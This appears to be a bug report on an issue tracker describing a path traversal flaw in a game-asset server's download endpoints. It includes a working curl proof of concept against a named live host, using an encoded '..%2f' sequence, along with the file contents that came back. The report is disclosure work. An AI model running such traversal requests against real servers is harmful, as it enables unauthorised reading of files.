Pretty much all the endpoints used to download game assets have a path traversal bug which allows getting files from anywhere in the filesystem.
$ curl https://refresh.jvyden.xyz/api/v3/assets/..%2frpc.json/download
{
"Version": 2,
"ApplicationId": 1138956002037866648,
"UseApplicationAssets": true,
"PodAsset": "pod",
"MoonAsset": null,
"RemoteMoonAsset": null,
"DeveloperAsset": null,
"DeveloperAdventureAsset": null,
"DlcAsset": null,
"FallbackAsset": "fallback"
}
The upload endpoint isn't affected since the hash is checked beforehand.
uhwot Reporter
Pretty much all the endpoints used to download game assets have a path traversal bug which allows getting files from anywhere in the filesystem.
Example:
Affected endpoints:
The upload endpoint isn't affected since the hash is checked beforehand.